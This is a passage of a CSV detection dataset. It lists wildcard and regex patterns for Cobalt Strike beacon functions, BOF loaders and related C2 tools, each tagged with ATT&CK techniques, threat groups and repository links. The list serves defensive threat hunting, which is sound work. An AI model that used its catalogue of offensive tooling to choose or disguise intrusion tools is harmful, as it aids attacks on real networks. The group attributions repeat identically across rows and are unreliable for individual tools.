Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","35648"
"*beacon_command_describe*",".{0,1000}beacon_command_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35649"
"*beacon_command_detail(""remotepipelist""*",".{0,1000}beacon_command_detail\(\""remotepipelist\"".{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","35650"
"*beacon_command_detail*",".{0,1000}beacon_command_detail.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35651"
"*beacon_command_register*",".{0,1000}beacon_command_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35652"
"*beacon_commands*",".{0,1000}beacon_commands.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35653"
"*beacon_compatibility.c*",".{0,1000}beacon_compatibility\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35654"
"*beacon_compatibility.h*",".{0,1000}beacon_compatibility\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","35655"
"*beacon_elevator_describe*",".{0,1000}beacon_elevator_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35656"
"*beacon_elevator_register*",".{0,1000}beacon_elevator_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35657"
"*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35658"
"*beacon_elevators*",".{0,1000}beacon_elevators.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35659"
"*beacon_endpoint*c2Get*",".{0,1000}beacon_endpoint.{0,1000}c2Get.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","35660"
"*beacon_endpoint*c2Post*",".{0,1000}beacon_endpoint.{0,1000}c2Post.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","35661"
"*beacon_execute_job*",".{0,1000}beacon_execute_job.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35662"
"*beacon_exploit_describe*",".{0,1000}beacon_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35663"
"*beacon_exploit_register*",".{0,1000}beacon_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","35664"
"*beacon_funcs.c*",".{0,1000}beacon_funcs\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","35665"
"*beacon_funcs.h*",".{0,1000}beacon_funcs\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 